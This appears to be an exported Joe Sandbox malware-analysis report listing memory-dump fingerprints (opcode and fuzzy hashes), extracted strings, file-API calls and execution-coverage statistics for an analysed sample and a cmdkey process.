                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Da
                                                  • API String ID: 0-4017735984
                                                  • Opcode ID: 9316faa78856749fcaf6bf43c4998f636474b1239366db97d4bf601bf7e65dd3
                                                  • Instruction ID: 845ec22d8c38c6d26f6a7da6d1669480cd2af7b09b70eaf335e4feb77637b932
                                                  • Opcode Fuzzy Hash: 9316faa78856749fcaf6bf43c4998f636474b1239366db97d4bf601bf7e65dd3
                                                  • Instruction Fuzzy Hash: 9101E9B6C1121DAFDB40DFE8D9419EEBBF8BB48200F14466AE919F7250F7715A048BA0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b66509caa5393f8826d054dc93688c93d755ac338231e8f6b8008b1f62fabce7
                                                  • Instruction ID: 3a98aef559a4406ab35b9cbf1546d63b615924c4a70286dd38eee74cc7202720
                                                  • Opcode Fuzzy Hash: b66509caa5393f8826d054dc93688c93d755ac338231e8f6b8008b1f62fabce7
                                                  • Instruction Fuzzy Hash: 3041E6B1D11319AFDB04CF99D885AEEBBBCFB49710F10415AFA18E6240E7B09641CBE4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                  • Instruction ID: 09916e7ceb7164405ea67e76839b4c5bd1caadd9e123cb5364e45b53ab5eb1dc
                                                  • Opcode Fuzzy Hash: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                  • Instruction Fuzzy Hash: 8D31C7B5A10649AFCB14DF98D881EDE77F9FF88700F108619F919A7340D730A851CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5e03eb6ca3a957da7972dbef890000bea05db59c4736c4e0835a4d4c5dfe491
                                                  • Instruction ID: 08618f3059f70f2ad25f617579b09ed226fd2bb6809587c1aa6a428ea2b6e7a9
                                                  • Opcode Fuzzy Hash: f5e03eb6ca3a957da7972dbef890000bea05db59c4736c4e0835a4d4c5dfe491
                                                  • Instruction Fuzzy Hash: 6231E5B5A14649AFCB14DF98D880EEEB7F9FF88704F108619F919A7240D730A811CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                  • Instruction ID: adda264e81de5a2b681cc19003d32d1364041eb73264553d25fa485c832cf6ab
                                                  • Opcode Fuzzy Hash: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                  • Instruction Fuzzy Hash: C731F8B5A00609AFCB14DF98D840EEEB7B9EF88700F108619F918AB240D730A811CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 195ff68caff478d4f81c18204550365703ddd76fc7baa3843e7ec858681f5af2
                                                  • Instruction ID: b14edaaad8975af9cd290ce605f356ded929c6d0df0cd616a2267fd546447f4c
                                                  • Opcode Fuzzy Hash: 195ff68caff478d4f81c18204550365703ddd76fc7baa3843e7ec858681f5af2
                                                  • Instruction Fuzzy Hash: 073108B5A10609ABDB14DF98D881EEF77B8FF88700F108519F918AB250E730A911CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f286edb9c98afbac45e0d50cce7c2b7f53c149ef7fcf70f38db5057c69621668
                                                  • Instruction ID: f4a6bc1572a16981c08b6d593f855813d31081465652c6643e3656a6c06633da
                                                  • Opcode Fuzzy Hash: f286edb9c98afbac45e0d50cce7c2b7f53c149ef7fcf70f38db5057c69621668
                                                  • Instruction Fuzzy Hash: 192107B5A10709AFDB14DF98DC41EEF77B8EF88700F108509F919AB241E770A951CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f22a7485913c754e88b3638ab54363130d6058ceb7c495f7f90824dfc6d7cc86
                                                  • Instruction ID: 7c3cc39c1020cd630c9bfbbc102fee3a5679be5d36e78df30eb4d568d726eac7
                                                  • Opcode Fuzzy Hash: f22a7485913c754e88b3638ab54363130d6058ceb7c495f7f90824dfc6d7cc86
                                                  • Instruction Fuzzy Hash: F411C6B63803067BF720DE59AC42FAF376CABC5B51F244005FB04AF2C1D6A5B81156B4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba0a0f3c2f76b1e974ca5b04baa06825b65764f3ca799ec1bd60b06ded6b563f
                                                  • Instruction ID: 3080b956d7bafe18a14fafce9ace7c0d2281687b14304046bda513fe432544cb
                                                  • Opcode Fuzzy Hash: ba0a0f3c2f76b1e974ca5b04baa06825b65764f3ca799ec1bd60b06ded6b563f
                                                  • Instruction Fuzzy Hash: 19117975A04709ABD710EAA8DC41FAF77BCEF85700F108949F9186B280E770A9128BA5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66cebfcf569bb08c01f2c10370893a6fa022b3067b7c6a65e054c6aa117c0f58
                                                  • Instruction ID: a1db93e34dc51cd585ea3e3021365c33323b240b7dc33a8785e59c72362a72dd
                                                  • Opcode Fuzzy Hash: 66cebfcf569bb08c01f2c10370893a6fa022b3067b7c6a65e054c6aa117c0f58
                                                  • Instruction Fuzzy Hash: 90119D75A00749AFD710EBA8DC41FAF77BCEF89700F008849F9596B281E77069128BA1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e88bdb1283228b5fe4f3fa13a64aa80a63a02a241f657ec0071946870b2e58f4
                                                  • Instruction ID: a911f92aa072f24bbd7deff397981f834a87607a113216d59671735971b29148
                                                  • Opcode Fuzzy Hash: e88bdb1283228b5fe4f3fa13a64aa80a63a02a241f657ec0071946870b2e58f4
                                                  • Instruction Fuzzy Hash: F10196BAA007156BE710EA98EC45DEF73BCEF84210F040296FD189B251FA70AE515AE1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88634f5be902afb418905d55730a32cbba09337d2fc41241c310505add177dbb
                                                  • Instruction ID: 37e327b3f0cab47b5d4306e0e0d9933dedf5e790e2497c13d00829d935ba23b5
                                                  • Opcode Fuzzy Hash: 88634f5be902afb418905d55730a32cbba09337d2fc41241c310505add177dbb
                                                  • Instruction Fuzzy Hash: EF11E5B1C21329AECB44CFA9E84559EBBF4FA09620B10869BE868E7250D37186418FD4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                  • Instruction ID: 6c1921fcc64c883155c4e0299aec6111ca768d017b96bcb99e9ecaebe1ed1c83
                                                  • Opcode Fuzzy Hash: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                  • Instruction Fuzzy Hash: 2801D2B6215608BBCB44DE99DC91EEB77ADEFCC710F058509BA0DE7240D630F8518BA4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bce1e8e66d9fb370936dbdde325440bcf9f58018128ed709c1e2b3a930bdcb0e
                                                  • Instruction ID: 8f70ad44e38e47dfbbf7e9a84ab87630142c8bdc1711d7b9cf4e2f502630133e
                                                  • Opcode Fuzzy Hash: bce1e8e66d9fb370936dbdde325440bcf9f58018128ed709c1e2b3a930bdcb0e
                                                  • Instruction Fuzzy Hash: 53F0A7736043166BD710DA5DFC45B9AF7ECFB84234F250263F95C8B2A1E671E45183A0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52be92208fa957c59c635bc52c23d1b49fddf8a844ff1113085167805b8f9e1e
                                                  • Instruction ID: 230c137e914398e721f116d21d628fe74f95171f83510c3b6fbf67937ebf4e20
                                                  • Opcode Fuzzy Hash: 52be92208fa957c59c635bc52c23d1b49fddf8a844ff1113085167805b8f9e1e
                                                  • Instruction Fuzzy Hash: 8AF01C79214609BBCB10EF99EC81EDB77BCEFC9710F008409B918AB241D670B9118BB0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                  • Instruction ID: 5744e1503ff9b577249d553efdc1d6cbef484f2c13bb9673c4fc611d5f4e3135
                                                  • Opcode Fuzzy Hash: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                  • Instruction Fuzzy Hash: 63E092762147057BCA10EE99EC41F9B77ACEFC5B10F004419F908A7241D770B8118BB4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b635b4ce4f1cda8984c8ad56069edb1c187f390a199ff0ce69444bd5efb70b0
                                                  • Instruction ID: 891d6f22142e7e8825507f8f1ad4f36800718c8b9ac5ea1d76509bfe49e35952
                                                  • Opcode Fuzzy Hash: 8b635b4ce4f1cda8984c8ad56069edb1c187f390a199ff0ce69444bd5efb70b0
                                                  • Instruction Fuzzy Hash: 57E0D8335042176B87515A6DAC44886FBADFACA2307250356E59897261D671A41283D0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                  • Instruction ID: 32306b6f3d734c8a7afab663675fc903ddbc16905052cbb2306b5cf1dbbf46e6
                                                  • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                  • Instruction Fuzzy Hash: 53F08271C0520DEBDF14DF68E881BDDBBB8EB04320F1087AAE8249B290D73597518B81
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                  • Instruction ID: 8074923c23378834450aae8f042b11ce810f4db7e559a9a152bae79aa3a36153
                                                  • Opcode Fuzzy Hash: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                  • Instruction Fuzzy Hash: 00E04F36A41A1427D230A58DAC05F9FB7AD9FC1A60F1D0065FE089B351E564A90082E4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction ID: 37a0d7bfbba18630dca64a9a38d74407400976d5e9d20fd25285487d92ef77e6
                                                  • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction Fuzzy Hash: 29E0467A214618BBC620EA99EC00E9B77ACEFC5A10F118415FA1CAB242D674B915CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                  • API String ID: 0-3248090998
                                                  • Opcode ID: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                  • Instruction ID: a7894b9064cd4ca76020ed3a9ab0f6f4760303963a1a445998f7a1d68b64ebb2
                                                  • Opcode Fuzzy Hash: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                  • Instruction Fuzzy Hash: FD911FF09052A98ACB118F55A4603DEBF71BB95204F1581EDC6AA7B203C3BE4E85DF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                  • API String ID: 0-3624523832
                                                  • Opcode ID: 42befa81100a3b777a9cd0e20ce04cc66b03185c562a6bccb102ea01b1ce48b1
                                                  • Instruction ID: 94e63eed40959a2d47f3e5aabefbf073b1eb406ee427db95c539a5b2b908f74f
                                                  • Opcode Fuzzy Hash: 42befa81100a3b777a9cd0e20ce04cc66b03185c562a6bccb102ea01b1ce48b1
                                                  • Instruction Fuzzy Hash: 9611A9B2900208EFDB14CF98DC85ADEFBB5FF44314F08865EE9199B116E7719945CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @MSJ$@MSJ$WRWF$}
                                                  • API String ID: 0-3893029086
                                                  • Opcode ID: 1b6785570093add07f930220f05d9e21393d54a4e8b0f8950e3b65ea46dd775b
                                                  • Instruction ID: cbb27195f5e885223233f1a7a6dfd58ca0766d97c4c2ea53e7d4c432f421697a
                                                  • Opcode Fuzzy Hash: 1b6785570093add07f930220f05d9e21393d54a4e8b0f8950e3b65ea46dd775b
                                                  • Instruction Fuzzy Hash: 8F21CAB0D442889ACB20CFD5EA842DEFFB1BB04204FA1855CC52A7F601DB365A568F95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $e$k$o
                                                  • API String ID: 0-3624523832
                                                  • Opcode ID: 74a0c612dd85ffc11efcfafd19d795e4e60962ead217c02992d87c4b88934f2c
                                                  • Instruction ID: ccc887612b8b57c2f7844f08ee58d8b71aa0a69f8aa79a6591412480f053d487
                                                  • Opcode Fuzzy Hash: 74a0c612dd85ffc11efcfafd19d795e4e60962ead217c02992d87c4b88934f2c
                                                  • Instruction Fuzzy Hash: 2501C4B2900308ABDB14DF98D884ADEFBB9FF48304F04865AE9196B201E771A545CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @MSJ$@MSJ$WRWF$}
                                                  • API String ID: 0-3893029086
                                                  • Opcode ID: 6d19f0e0b6106dd2e0fa304ac2787c2f3053dd4dbb73a6ffdbee81285f4efd5a
                                                  • Instruction ID: 62ffbcd3ff8426612cda14b0fa17b64c22443a6127344f50eb8830a25b72e4c2
                                                  • Opcode Fuzzy Hash: 6d19f0e0b6106dd2e0fa304ac2787c2f3053dd4dbb73a6ffdbee81285f4efd5a
                                                  • Instruction Fuzzy Hash: 66110FB1D45288DACF14CFC5E9841DEBFB1FF04614FA48988C11A7F601CB3A5A528F99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "3G$0:$HD$ZI|n
                                                  • API String ID: 0-3571891404
                                                  • Opcode ID: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                  • Instruction ID: 04a09c5dc8ba3271fe0cf4094f0a4010ea568ca093affe412b7318e2e3c644f3
                                                  • Opcode Fuzzy Hash: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                  • Instruction Fuzzy Hash: C5F064B1D01328ABEB10EF99D902ADEBB78FF0A300F544048E9513B241E7B04A408BE6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "3G$0:$HD$ZI|n
                                                  • API String ID: 0-3571891404
                                                  • Opcode ID: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                  • Instruction ID: adc0daa88b0a387d9ee792fc2b28b2d75695830e5caaa0895ccf0c1da3beef61
                                                  • Opcode Fuzzy Hash: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                  • Instruction Fuzzy Hash: 6F0169B1E51229AFEB10EF89D9419DEBB78FF1A350F544148E9517B242D7B04A008FE6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$F[HQ$GM@U$S
                                                  • API String ID: 0-2185307660
                                                  • Opcode ID: aad7c3a1c88034455b0e6ab1c39a59cecf2009c13dde3b95f7a6a18687442a4f
                                                  • Instruction ID: ebd23aaf21ae7162527e9ccae6db18371f3f698b947cdb176a38ed3a0f5934a3
                                                  • Opcode Fuzzy Hash: aad7c3a1c88034455b0e6ab1c39a59cecf2009c13dde3b95f7a6a18687442a4f
                                                  • Instruction Fuzzy Hash: 23F06DB1D1024C6BDF00DFA8DD056EEFBB5BB40300F6045A8C958AF251E7759B40CB96

                                                  Execution Graph

                                                  Execution Coverage:3.3%
                                                  Dynamic/Decrypted Code Coverage:4.1%
                                                  Signature Coverage:0.6%
                                                  Total number of Nodes:467
                                                  Total number of Limit Nodes:74

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #W$)/$,$8$8$?ypG$B$CI$N$Vw$Yg$ZA$^^$_$a$cW$l\$pG$wN${p$q
                                                  • API String ID: 0-914735403
                                                  • Opcode ID: 27aad659b676bfce25ed300dbfebfbd60364c1ec14c9cd4ab922d91898041615
                                                  • Instruction ID: 2742faf69a4257882b372e9f0eb363904c2ee0b2e26c590dec1f424a6aae21ff
                                                  • Opcode Fuzzy Hash: 27aad659b676bfce25ed300dbfebfbd60364c1ec14c9cd4ab922d91898041615
                                                  • Instruction Fuzzy Hash: 46328EB0D05228CBEB68CF84C994BDDBBB1BB54308F2081DAD44D6B290CBB55AC9DF55
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 00A4C7F4
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 00A4C82F
                                                  • FindClose.KERNELBASE(?), ref: 00A4C83A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                  • Instruction ID: 97bf29375ed1c1cbc8378e28a69968ab70dbe8824f1683084b3235ed2dd8a91b
                                                  • Opcode Fuzzy Hash: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                  • Instruction Fuzzy Hash: 743172B5A00308BBDB60EFA0CD85FFF777CAB84715F144459B908A7191DA70AA84CBA0
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?,?,?), ref: 00A59301
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                  • Instruction ID: dea062f1c80a2e017ac113de72b54b6d96ecf3879f3e76583394a42f7e8014e9
                                                  • Opcode Fuzzy Hash: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                  • Instruction Fuzzy Hash: FD31C0B5A00208AFCB14DF98C981EEEB7F9EF8C314F108219F919A7341D730A851CBA5
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?), ref: 00A59456
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                  • Instruction ID: f0446beed5c3987dcd0bfbfc47ad35b5f9fc83c35479eaa88ab45d75cec8c409
                                                  • Opcode Fuzzy Hash: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                  • Instruction Fuzzy Hash: 2831E3B5A00208AFCB14DF98C881EEFB7B9EF88714F108219FD18A7345D734A911CBA5
                                                  APIs
